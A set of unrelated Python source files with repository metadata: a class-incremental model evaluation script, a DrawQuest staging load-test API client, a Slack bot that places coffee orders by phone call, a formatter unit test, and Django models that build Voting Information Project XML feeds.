parser.add_argument("--batch_size", type=int, default=64)
parser.add_argument("--model", type=str, default='resnet18')
parser.add_argument("--gpu_id", type=str, default='0')
parser.add_argument("--start", type=int, default=1)
parser.add_argument("--end", type=int, default=10)
parser.add_argument("--phases", type=int, default=10)
return parser
def main():
opts = get_parser().parse_args()
models_folder=os.path.join(opts.model_root,opts.dataset_name,str(opts.phases)+'phases','amalgamation_models')
model_file_name_list=os.listdir(models_folder)
for model_file_name in model_file_name_list:
model_path=os.path.join(models_folder,model_file_name)
model = _model_dict[opts.model]()
state = torch.load(model_path, map_location=lambda storage, loc: storage)
num_cls = state['num_classes']
model.fc = nn.Linear(model.fc.in_features, num_cls)
model.load_state_dict(state['state_dict'])
model.cuda()
model.eval()
val_file_path_list = []
val_dataset_folder = os.path.join(opts.data_root,opts.dataset_name,str(opts.phases)+'phases','separated/test/batch_test')
val_dataset_filename_list = os.listdir(val_dataset_folder)
for val_dataset_filename in val_dataset_filename_list[:int(model_file_name[-2:])]:
val_file_path = os.path.join(val_dataset_folder,val_dataset_filename)
val_file_path_list.append(val_file_path)
val_loader = get_concat_val_loader(val_file_path_list,opts.dataset_name,val_dataset_folder, opts.batch_size)
top = AverageMeter()
class_num_each_phase = _dataset_class_number[opts.dataset_name] // opts.phases
for data in val_loader:
inputs, labels = data
if tc.is_available():
inputs, labels = inputs.cuda(0), labels.cuda(0)
outputs = model(inputs)
output_output = outputs
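            # Batch-label masking: for every sample, push the logits outside
            # the phase that contains its gold label below the minimum, so the
            # argmax is restricted to that phase's classes.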
for label_index in range(len(outputs)):
min_value = torch.min(outputs[label_index])
for phase in range(opts.phases):
if class_num_each_phase * phase <= labels[label_index] < class_num_each_phase * (phase + 1):
outputs[label_index][:class_num_each_phase * phase] = min_value - 1
outputs[label_index][class_num_each_phase * (phase + 1):] = min_value - 1
if opts.dataset_name == 'ilsvrc2012':
# compute top-5 classification accuracy for ilsvrc 2012
_, prec = accuracy(outputs.data, labels, topk=(1, 5))
else:
# compute top-1 classification accuracy for cifar100 and mnist
prec, _ = accuracy(outputs.data, labels, topk=(1, 2))
top.update(prec.item(), inputs.size(0)) # inputs.size(0) = batch_size
print(top.avg)
if __name__ == '__main__':
main()
authors: ["xwh@ouc.edu.cn"] | author_id: xwh@ouc.edu.cn

blob_id: 934e6966fbd17ae8a420204911909a52151bbaf6 | directory_id: 8d5f49fa1fda8ffc473e7f5a62786c77838a5820
path: /website/load_tests/drawquest/test_scripts/utils.py | content_id: e305eef730b14c15bd7911f0cf1ade88885204ff
detected_licenses: ["BSD-3-Clause"] | license_type: permissive | repo_name: MichaelBechHansen/drawquest-web
snapshot_id: dfc6f5d9541860a5df23db678e82564a230bd42e | revision_id: 8d8f9149b6efeb65202809a5f8916386f58a1b3b | branch_name: refs/heads/master
visit_date: 2021-01-14T10:30:10.861222 | revision_date: 2015-11-10T03:13:42 | committer_date: 2015-11-10T03:13:42
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,724 | extension: py
content:
import json
import uuid
import requests
PASSWORD = 'testpassword'
#QUEST_ID = 658
#QUEST_ID = 926 #staging smilie
QUEST_ID = 7004
PLAYBACK_DATA = ''
TEST_USERNAME = 'test_account__'
TEST_PASSWORD = 'testaccount'
class ApiError(Exception):
pass
class HttpError(Exception):
pass
class ApiConsumer(object):
def __init__(self):
self.session_id = None
def call(self, endpoint, params={}):
payload = json.dumps(params)
headers = {
'content-type': 'application/json',
}
if self.session_id:
headers['X-SESSIONID'] = self.session_id
ret = requests.post('http://api.staging.example.com/' + endpoint, data=payload, headers=headers)
if ret.status_code != 200:
raise HttpError(ret.status_code)
if not ret.json.get('success'):
raise ApiError(ret.json)
return ret.json
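    # Example flow (hypothetical): c = ApiConsumer(); c.signup() stores the
    # returned session id, so subsequent call()s send the X-SESSIONID header.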
def signup(self, username=None):
if not username:
username = '_TEST_' + str(uuid.uuid4())[-10:].replace('-', '_')
ret = self.call('auth/signup', {
'username': username,
'email': '{}@example.example'.format(username),
'password': PASSWORD,
})
self.session_id = ret['sessionid']
def heavy_state_sync(self):
return self.call('heavy_state_sync')
def onboarding_quest(self):
return self.call('quests/onboarding')
def quest_comments(self, quest_id):
return self.call('quests/comments', {'quest_id': quest_id})
class DrawquestTransaction(object):
def __init__(self):
self.custom_timers = {}
def main(trans_cls):
trans = trans_cls()
trans.run()
print trans.custom_timers
authors: ["alex.ehlke@gmail.com"] | author_id: alex.ehlke@gmail.com

blob_id: e80bbd400c9eb77464d747268c9691a9848a9705 | directory_id: af955fdd32cf9f6cb74b4f58cada1683063ccb59
path: /hal_commands.py | content_id: b1bd49708ffeff2c0695e4b16f66699c15c26a9a
detected_licenses: [] | license_type: no_license | repo_name: Pepedou/HAL-9000
snapshot_id: b2ec753cf73458c13fb95595221e535a57f27e98 | revision_id: 54c742bc7212a0f6756069754c9863f6a4c54d67 | branch_name: refs/heads/master
visit_date: 2020-12-31T07:34:16.522196 | revision_date: 2017-03-29T04:09:08 | committer_date: 2017-03-29T04:09:08
github_id: 86,535,698 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 3,115 | extension: py
content:
__author__ = 'José Luis Valencia Herrera'
import os
import plivo_text_to_speech
import utils
class HalCommandTypes:
COFFEE_COMMAND = "coffee"
class HalCommand:
def __init__(self):
self.raw_request = ""
self.requesting_user = ""
self.command_arguments = []
def execute(self):
pass
class HalCommandParser:
@staticmethod
def parse_command_from_message_text(message_text: str):
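        # Expected message shape (inferred, hypothetical example):
        #   '@hal coffee "one latte" "200"'
        # token [1] names the command; the quoted segments become its arguments.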
parsed_command = {}
split_message = message_text.split(' ')
if split_message[1] == str(HalCommandTypes.COFFEE_COMMAND):
parsed_command['command_type'] = HalCommandTypes.COFFEE_COMMAND
parsed_command['command_arguments'] = message_text.split('"')[1:]
else:
raise Exception("Unable to parse command type")
return parsed_command
class CoffeeCommand(HalCommand):
COFFEE_HOUSE_NUMBER = os.environ.get('COFFEE_HOUSE_NUMBER', "")
def execute(self):
try:
success = plivo_text_to_speech.send_call(self.COFFEE_HOUSE_NUMBER,
self.requesting_user['real_name_normalized'],
self.command_arguments[0],
self.command_arguments[1])
if success:
if "tarjeta" in self.command_arguments[1].lower():
response_ending = "and a terminal should be brought to you for payment."
else:
response_ending = "and I've requested change for a ${0} bill.".format(self.command_arguments[1])
response = "Affirmative, {0}. I've placed the order \"{1}\" " \
"{2}".format(
self.requesting_user['first_name'],
self.command_arguments[0], response_ending)
else:
response = "I'm sorry {0}, I'm afraid I can't do that. There was an error sending the message. " \
"I think you know what the problem is just as well as I do.".format(
self.requesting_user['first_name'])
except Exception as e:
response = "I'm sorry {0}, I'm afraid I can't do that. There was an error sending the message. " \
"I think you know what the problem is just as well as I do. Error: {1}".format(
self.requesting_user['first_name'], str(e))
return response
class HalCommandBuilder:
@staticmethod
def build_command_from_event(command_event):
parsed_command = HalCommandParser.parse_command_from_message_text(command_event['text'])
if parsed_command['command_type'] == HalCommandTypes.COFFEE_COMMAND:
coffee_command = CoffeeCommand()
coffee_command.requesting_user = utils.get_user_by_id(command_event['user'])['profile']
coffee_command.command_arguments = parsed_command['command_arguments']
return coffee_command
else:
raise Exception("Unhandled command type")
authors: ["pepedou@gmail.com"] | author_id: pepedou@gmail.com

blob_id: 40d86f8b94472be347d9dfd40e701d0c50a4370d | directory_id: ac85e1ba9b5cf9e72698705560be1e9470a13c48
path: /test_formater.py | content_id: ae4b33023f1dffd058513074b53a8f2068e78b84
detected_licenses: [] | license_type: no_license | repo_name: FernandaHinojosa/testing
snapshot_id: 79c7a3bae92a09a383acee2c877b5dd1aa206671 | revision_id: 7f43eaf47591a80f16749041524f61d624ac0975 | branch_name: refs/heads/master
visit_date: 2021-07-24T05:40:47.254881 | revision_date: 2017-11-06T14:16:29 | committer_date: 2017-11-06T14:16:29
github_id: null | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 1,200 | extension: py
content:
from unittest import TestCase
from main import Formater
import sys
sys.tracebacklimit = 0
class TestFormater(TestCase):
def setUp(self):
print(self._testMethodDoc)
def tearDown(self):
pass
def test_clean_integers(self):
"""-- Test Clean Integers"""
msg = "The correct numerical value is not being returned"
self.assertEqual(Formater.clean_number('9, 000 000'), 9000000, msg=msg)
self.assertEqual(Formater.clean_number('5'), 5, msg=msg)
self.assertEqual(Formater.clean_number('58, 710, 520'), 58710520, msg=msg)
def test_correct_int_cast(self):
"""-- Test Int Cast """
msg = "The correct type is not being returned for the integers"
self.assertIsInstance(Formater.clean_number('9, 000 000'), int, msg=msg)
self.assertIsInstance(Formater.clean_number('5'), int)
self.assertIsInstance(Formater.clean_number('58, 710, 520'), int, msg=msg)
def test_clean_floats(self):
pass
def test_correct_float_cast(self):
pass
    def test_comma_after_dot(self):
pass
def test_multiple_dots(self):
pass
    def test_no_valid_entries(self):
pass
authors: ["red2000ace@gmail.com"] | author_id: red2000ace@gmail.com

blob_id: 566d49bca2e69081ec3642a0f489a87b16e2ca06 | directory_id: 3da85bca3dcedda942a7143393f84dd0132620ee
path: /vip52/models.py | content_id: 3d311f0ff15d2113a5e8ffd26c939e8f47184b0e
detected_licenses: [] | license_type: no_license | repo_name: afsmythe/vip_feed_builder
snapshot_id: ff9320b72de76f6b73b6fc6e62ab283ce629fc67 | revision_id: ee68a717284b72437435315c9a10510ab59b457e | branch_name: refs/heads/main
visit_date: 2023-07-14T00:04:29.672211 | revision_date: 2021-08-18T22:07:54 | committer_date: 2021-08-18T22:07:54
github_id: 397,379,596 | star_events_count: 0 | fork_events_count: 0
gha_license_id: null | gha_event_created_at: null | gha_created_at: null | gha_language: null
src_encoding: UTF-8 | language: Python | is_vendor: false | is_generated: false | length_bytes: 32,265 | extension: py
content:
from django.core.exceptions import ObjectDoesNotExist
from django.db import models
from django.forms import model_to_dict, fields_for_model
from lxml import etree
from lxml.etree import Element
import pprint
def xml_element(model):
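    # Serializes a Django model instance to an lxml Element: scalar fields
    # become child tags, known sub-types (InternationalizedText, LatLng,
    # Schedule, ...) render via their own xml() helpers, and remaining related
    # objects collapse to a space-separated list of id references.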
sequence = fields_for_model(model, exclude = ['id']).keys()
dict = model_to_dict(model, exclude = ['id'])
element = etree.Element(model.__class__.__name__, attrib = {'id': str(model.id)})
e_dict = dict
#e_dict = self.dict()
for i in sequence:
key, val = i, e_dict[i]
#for key, val in e_dict.items():
if isinstance(val, list) and len(val) > 0:
#print(val)
child = Element(key)
l = []
for i in val:
#check if type is a sub-type.
if isinstance(i, InternationalizedText):
#todo add .xml() method to InternationalizedText model
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
                elif isinstance(i, ExternalIdentifier):
                    # each ExternalIdentifier gets its own wrapper element
                    child = Element(key)
                    child.append(i.xml())
                    element.append(child)
elif isinstance(i, LatLng):
latlng = LatLng.objects.get(id = i.id)
child = latlng.xml()
element.append(child)
elif isinstance(i, Schedule):
print('Schedule found')
schedule = Schedule.objects.get(id = i.id)
child = schedule.xml()
element.append(child)
elif isinstance(i, SimpleAddressType):
print('Structured Address')
structuredaddress = SimpleAddressType.objects.get(id = i.id)
child = structuredaddress.xml()
element.append(child)
elif isinstance(i, ElectionNotice):
print('Election Notice')
notice = ElectionNotice.objects.get(id = i.id)
child = notice.xml()
element.append(child)
else:
#it is not a sub-type, is IDXREFS
l.append(str(i.id))
child.text = " ".join(l)
element.append(child)
else:
if key == 'Date':
date = Element('Date')
date.text = str(val)
element.append(date)
elif val is None or val == '' or len(val) == 0:
#elif val is None or val == '':
continue
elif key == 'Department':
print('Department')
dep = Department.objects.get(id = val)
child = dep.xml()
element.append(child)
try:
vs = VoterService.objects.get(id = dep.VoterService_id)
print('VoterService')
child.append(vs.xml())
                except ObjectDoesNotExist:
                    pass
# elif key == 'VoterService':
# print('Voter Service')
# vs = VoterService.objects.get(id = val)
# child = vs.xml()
# element.append(child)
else:
#regular value
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
# Create your models here.
class Source(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Name = models.CharField(max_length = 500, blank = True, null = True)
VipId = models.CharField(max_length = 50, blank = True, null = True)
DateTime = models.CharField(max_length = 50, blank = True, null = True)
class InternationalizedText(models.Model):
Language = models.CharField(max_length = 2, default = 'en')
LanguageString = models.CharField(max_length = 5000)
def __str__(self):
return("{}: {}".format(self.Language, self.LanguageString))
def xml(self):
it_element = Element('Text', attrib = {'language': self.Language})
it_element.text = self.LanguageString
return(it_element)
class ExternalIdentifier(models.Model):
Type = models.CharField(max_length = 50, blank = True, null = True)
OtherType = models.CharField(max_length = 100, blank = True, null = True)
Value = models.CharField(max_length = 100, blank = True, null = True)
def __str__(self):
return("{}: {}".format(self.Type, self.Value))
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = Element('ExternalIdentifier')
for key, val in self.dict().items():
if val is not None:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class Hours(models.Model):
StartTime = models.CharField(max_length = 50, blank = True, null = True)
EndTime = models.CharField(max_length = 50, blank = True, null = True)
def xml(self):
return(xml_element(self))
class Schedule(models.Model):
Hours = models.ManyToManyField(Hours, blank = True, max_length = 1000)
IsOnlyByAppointment = models.CharField(max_length = 50, blank = True, null = True)
IsOrByAppointment = models.CharField(max_length = 50, blank = True, null = True)
IsSubjectToChange = models.CharField(max_length = 50, blank = True, null = True)
StartDate = models.CharField(max_length = 50, blank = True, null = True)
EndDate = models.CharField(max_length = 50, blank = True, null = True)
def xml(self):
schedule = etree.Element('Schedule')
for key, val in model_to_dict(self, exclude = ['id']).items():
if isinstance(val, list):
for ho in val:
child = ho.xml()
schedule.append(child)
elif val != None:
child = Element(key)
child.text = str(val)
schedule.append(child)
return(schedule)
class HoursOpen(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Schedule = models.ManyToManyField(Schedule, blank = True, max_length = 1000)
def xml(self):
hoursopen = etree.Element('HoursOpen', attrib = {'id':self.id})
for key, val in model_to_dict(self, exclude = ['id']).items():
if isinstance(val, list):
for sch in val:
child = sch.xml()
hoursopen.append(child)
else:
child = Element(key)
child.text = str(val)
hoursopen.append(child)
return(hoursopen)
class LatLng(models.Model):
Latitude = models.CharField(max_length = 50)
Longitude = models.CharField(max_length = 50)
Source = models.CharField(max_length = 50, blank = True, null = True)
def __str__(self):
return("{}: {}, {}".format(self.Source, self.Latitude, self.Longitude))
def xml(self):
sequence = fields_for_model(self, exclude = ['id']).keys()
dict = model_to_dict(self, exclude = ['id'])
element = etree.Element('LatLng')
for key in sequence:
val = dict[key]
#for key, val in model_to_dict(self, exclude = ['id']).items():
#print(key, val)
            if val is not None and val != '':
child = Element(key)
child.text = str(val)
element.append(child)
latlng = model_to_dict(self, exclude = ['id'])
return(element)
class ContactInformation(models.Model):
AddressLine = models.CharField(max_length = 1000, blank = True, null = True)
Directions = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
Email = models.CharField(max_length = 100, blank = True, null = True)
Fax = models.CharField(max_length = 100, blank = True, null = True)
HoursOpenId = models.CharField(max_length = 100, blank = True, null = True)
LatLng = models.CharField(max_length = 100, blank = True, null = True)
Name = models.CharField(max_length = 1000, blank = True, null = True)
Phone = models.CharField(max_length = 100, blank = True, null = True)
Uri = models.URLField(blank = True, null = True)
parent_id = models.CharField(max_length = 100, blank = True, null = True)
def dict(self):
return(model_to_dict(self, exclude = ['id','parent_id']))
def xml(self):
element = Element('ContactInformation')
for key, val in self.dict().items():
            if isinstance(val, list) and len(val) > 0:
                child = Element(key)
                for i in val:
                    it_child = Element('Text', attrib = {'language': i.Language})
                    it_child.text = i.LanguageString
                    child.append(it_child)
                element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class Party(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Abbreviation = models.CharField(max_length = 50, blank = True, null = True)
Color = models.CharField(max_length = 10, blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
IsWriteIn = models.CharField(max_length = 10, blank = True, null = True)
LogoUri = models.URLField(blank = True, null = True)
Name = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
class Person(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
DateOfBirth = models.DateTimeField(blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
FirstName = models.CharField(max_length = 50, blank = True, null = True)
FullName = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'person_full_name')
Gender = models.CharField(max_length = 50, blank = True, null = True)
LastName = models.CharField(max_length = 50, blank = True, null = True)
MiddleName = models.CharField(max_length = 50, blank = True, null = True)
Nickname = models.CharField(max_length = 50, blank = True, null = True)
PartyId = models.ForeignKey(Party, on_delete = models.CASCADE, db_column = 'PartyId', blank = True, null = True)
Prefix = models.CharField(max_length = 50, blank = True, null = True)
Profession = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'person_profession')
Suffix = models.CharField(max_length = 50, blank = True, null = True)
Title = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'person_title')
class Candidate(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
BallotName = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
FileDate = models.CharField(max_length = 50, blank = True, null = True)
IsIncumbent = models.CharField(max_length = 50, blank = True, null = True)
IsTopTicket = models.CharField(max_length = 50, blank = True, null = True)
PartyId = models.ForeignKey(Party, on_delete = models.CASCADE, db_column = 'PartyId', blank = True, null = True)
PersonId = models.ForeignKey(Person, on_delete = models.CASCADE, db_column = 'PersonId', blank = True, null = True)
PostElectionStatus = models.CharField(max_length = 50, blank = True, null = True)
PreElectionStatus = models.CharField(max_length = 50, blank = True, null = True)
SequenceOrder = models.CharField(max_length = 50, blank = True, null = True)
class BallotMeasureSelection(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Selection = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
SequenceOrder = models.CharField(max_length = 50, blank = True, null = True)
def __str__(self):
return(self.id)
class BallotMeasureContest(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Abbreviation = models.CharField(max_length = 100, blank = True, null = True)
BallotSelectionIds = models.ManyToManyField(BallotMeasureSelection, blank = True, max_length = 1000)
BallotSubTitle = models.ManyToManyField(InternationalizedText, related_name = 'bmc_ballot_sub_title',blank = True, max_length = 200)
BallotTitle = models.ManyToManyField(InternationalizedText, related_name = 'bmc_ballot_title',blank = True, max_length = 200)
ElectoralDistrictId = models.ForeignKey('ElectoralDistrict', blank = True, db_column = 'ElectoralDistrictId', on_delete = models.CASCADE)
ElectorateSpecification = models.ManyToManyField(InternationalizedText, related_name = 'bmc_electorate_specification',blank = True, max_length = 200)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 200)
HasRotation = models.CharField(max_length = 50, blank = True, null = True)
Name = models.CharField(max_length = 100, blank = True, null = True)
SequenceOrder = models.CharField(max_length = 100, blank = True, null = True)
VoteVariation = models.CharField(max_length = 100, blank = True, null = True)
OtherVoteVariation = models.CharField(max_length = 100, blank = True, null = True)
ConStatement = models.ManyToManyField(InternationalizedText, related_name = 'bmc_con_statement', blank = True, max_length = 200)
EffectOfAbstain = models.ManyToManyField(InternationalizedText, related_name = 'bmc_effect_of_abstain',blank = True, max_length = 200)
FullText = models.ManyToManyField(InternationalizedText, related_name = 'bmc_full_text',blank = True, max_length = 200)
InfoUri = models.URLField(blank = True, null = True)
PassageThreshold = models.ManyToManyField(InternationalizedText, related_name = 'bmc_passage_threshold',blank = True, max_length = 200)
ProStatement = models.ManyToManyField(InternationalizedText, related_name = 'bmc_pro_statement',blank = True, max_length = 200)
SummaryText = models.ManyToManyField(InternationalizedText, related_name = 'bmc_summary_text',blank = True, max_length = 200)
Type = models.CharField(max_length = 50, blank = True, null = True)
OtherType = models.CharField(max_length = 50, blank = True, null = True)
class CandidateSelection(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
SequenceOrder = models.CharField(max_length = 50, blank = True, null = True)
CandidateIds = models.ManyToManyField(Candidate, blank = True, max_length = 200)
EndorsementPartyIds = models.ManyToManyField(Party, blank = True, max_length = 200)
IsWriteIn = models.CharField(max_length = 50, blank = True, null = True)
class CandidateContest(models.Model):
id = models.CharField(primary_key = True, max_length = 100)
Abbreviation = models.CharField(max_length = 100, blank = True, null = True)
BallotSelectionIds = models.ManyToManyField(CandidateSelection, blank = True, max_length = 1000)
BallotSubTitle = models.ManyToManyField(InternationalizedText, related_name = 'cc_ballot_sub_title',blank = True, max_length = 200)
BallotTitle = models.ManyToManyField(InternationalizedText, related_name = 'cc_ballot_title',blank = True, max_length = 200)
ElectoralDistrictId = models.ForeignKey('ElectoralDistrict',on_delete = models.CASCADE, db_column = 'ElectoralDistrictId', max_length = 1000)
ElectorateSpecification = models.ManyToManyField(InternationalizedText, related_name = 'cc_electorate_specification', blank = True, max_length = 200)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
HasRotation = models.CharField(max_length = 1000, blank = True, null = True)
Name = models.CharField(max_length = 2000, blank = True, null = True)
SequenceOrder = models.CharField(max_length = 100, blank = True, null = True)
VoteVariation = models.CharField(max_length = 100, blank = True, null = True)
OtherVoteVariation = models.CharField(max_length = 100, blank = True, null = True)
NumberElected = models.CharField(max_length = 100, blank = True, null = True)
OfficeIds = models.ManyToManyField('Office', blank = True, max_length = 1000)
PrimaryPartyIds = models.ManyToManyField('Party', blank = True, max_length = 1000)
VotesAllowed = models.CharField(max_length = 100, blank = True, null = True)
class Election(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Date = models.CharField(max_length = 50, blank = True, null = True)
HoursOpenId = models.CharField(max_length = 50, blank = True, null = True)
PollingHours = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_hours')
ElectionType = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_type')
StateId = models.ForeignKey('State', on_delete=models.CASCADE, db_column = 'StateId')
IsStatewide = models.CharField(max_length = 10, blank = True, null = True)
Name = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_name')
RegistrationInfo = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'election_registration_info')
AbsenteeBallotInfo = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'absentee_ballot_info')
ResultsUri = models.URLField(blank = True, null = True)
HasElectionDayRegistration = models.CharField(max_length = 10, blank = True, null = True)
RegistrationDeadline = models.CharField(max_length = 50, blank = True, null = True)
AbsenteeRequestDeadline = models.CharField(max_length = 50, blank = True, null = True)
class VoterService(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
Description = models.ForeignKey(InternationalizedText, blank = True, max_length = 2000, on_delete = models.CASCADE)
Type = models.CharField(max_length = 50, blank = True, null = True)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = etree.Element('VoterService')
for key, val in self.dict().items():
if key == 'Description':
                child = Element('Description')
                it = InternationalizedText.objects.get(id = val)
                child.append(it.xml())
                element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class Department(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
ElectionOfficialPersonId = models.ForeignKey(Person, db_column = 'ElectionOfficialPersonId', on_delete = models.CASCADE, blank = True, null = True)
VoterService = models.ForeignKey(VoterService, on_delete = models.CASCADE, blank = True, null = True)
election_administration_id = models.CharField(max_length = 50, blank = True, null = True)
#def __str__(self):
# return(self.ContactInformation)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = etree.Element('Department')
for key, val in self.dict().items():
if isinstance(val, list) and len(val) > 0:
for i in val:
child = Element(key)
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
# elif key == 'VoterService':
# print('Voter Service')
# vs = VoterService.objects.get(id = val)
# child = vs.xml()
# element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class ElectionNotice(models.Model):
NoticeText = models.ManyToManyField(InternationalizedText, blank = True, max_length = 5000)
NoticeUri = models.URLField(blank = True, null = True)
def dict(self):
return(model_to_dict(self, exclude = ['id']))
def xml(self):
element = Element('ElectionNotice')
for key, val in self.dict().items():
if isinstance(val, list) and len(val) > 0:
for i in val:
child = Element(key)
it_child = Element('Text', attrib = {'language': i.Language})
it_child.text = i.LanguageString
child.append(it_child)
element.append(child)
else:
if val is None or val == '' or len(val) == 0:
continue
else:
child = Element(key)
child.text = str(val)
element.append(child)
return(element)
class ElectionAdministration(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
AbsenteeUri = models.URLField(blank = True, null = True)
AmIRegisteredUri = models.URLField(blank = True, null = True)
BallotTrackingUri = models.URLField(blank = True, null = True)
BallotProvisionalTrackingUri = models.URLField(blank = True, null = True)
Department = models.ForeignKey(Department, on_delete = models.CASCADE, max_length = 2000, default = 'dep1')
    ElectionNotice = models.ManyToManyField(ElectionNotice, blank = True)
ElectionsUri = models.URLField(max_length = 1000, blank = True, null = True)
RegistrationUri = models.URLField(blank = True, null = True)
RulesUri = models.URLField(blank = True, null = True)
WhatIsOnMyBallotUri = models.URLField(blank = True, null = True)
WhereDoIVoteUri = models.URLField(blank = True, null = True)
class ElectoralDistrict(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
Name = models.CharField(blank = True, null = True ,max_length = 100)
Number = models.CharField(blank = True, null = True ,max_length = 50)
Type = models.CharField(blank = True, null = True ,max_length = 50)
OtherType = models.CharField(blank = True, null = True ,max_length = 50)
def __str__(self):
return("Name: {}; Number: {}".format(self.Name, self.Number))
class Office(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ContactInformation = models.ManyToManyField(ContactInformation, blank = True, max_length = 1000)
Description = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'office_description')
ElectoralDistrictId = models.ForeignKey(ElectoralDistrict, db_column = 'ElectoralDistrictId', on_delete = models.CASCADE, blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
FilingDeadline = models.CharField(blank = True, null = True, max_length = 100)
IsPartisan = models.CharField(blank = True, null = True, max_length = 100)
Name = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'office_name')
OfficeHolderPersonIds = models.ManyToManyField(Person, blank = True)
Term = models.CharField(blank = True, null = True, max_length = 100)
class Locality(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
ElectionAdministrationId = models.ForeignKey('ElectionAdministration', on_delete = models.CASCADE, db_column = 'ElectionAdministrationId', blank = True, null = True)
ExternalIdentifiers = models.ManyToManyField(ExternalIdentifier, blank = True, max_length = 1000)
IsMailOnly = models.CharField(max_length = 50, blank = True, null = True)
Name = models.CharField(max_length = 100, blank = False, default = None)
PollingLocationIds = models.ManyToManyField('PollingLocation',max_length = 10000, blank = True)
StateId = models.ForeignKey('State', on_delete = models.CASCADE, db_column = 'StateId', blank = True, null = True)
Type = models.CharField(blank = True, null = True, max_length = 100)
OtherType = models.CharField(blank = True, null = True, max_length = 100)
# def __str__(self):
# return(self.Name)
class SimpleAddressType(models.Model):
Line1 = models.CharField(max_length = 100)
Line2 = models.CharField(blank = True, null = True, max_length = 100, default = '')
Line3 = models.CharField(blank = True, null = True, max_length = 100, default = '')
City = models.CharField(max_length = 100)
State = models.CharField(max_length = 100)
Zip = models.CharField(blank = True, null = True, max_length = 100, default = "")
    def dict(self):
        field_values = model_to_dict(self, exclude = ['id'])
        sequence = fields_for_model(self, exclude = ['id']).keys()
        # build an ordered mapping in declared-field order
        o_dict = collections.OrderedDict()
        for name in sequence:
            o_dict[name] = field_values[name]
        return(o_dict)
    def xml(self):
        element = Element('AddressStructured')
        field_values = model_to_dict(self, exclude = ['id'])
        sequence = fields_for_model(self, exclude = ['id']).keys()
        for i in sequence:
            val = field_values[i]
            if val is not None:
                child = Element(i)
                child.text = str(val)
                element.append(child)
        return(element)
class PollingLocation(models.Model):
id = models.CharField(primary_key = True, max_length = 50)
    AddressStructured = models.ManyToManyField(SimpleAddressType, blank = True)
AddressLine = models.CharField(blank = True, null = True, max_length = 1000)
Directions = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200, related_name = 'pl_directions')
Hours = models.ManyToManyField(InternationalizedText, blank = True, max_length = 200)
#HoursOpenId = models.ForeignKey('HoursOpen', on_delete=models.CASCADE, blank = True, null = True)
HoursOpenId = models.ForeignKey(HoursOpen, db_column = 'HoursOpenId', on_delete = models.SET_NULL, max_length = 50, blank = True, null = True)
IsDropBox = models.CharField(max_length = 50, blank = True, null = True, default = 'false')
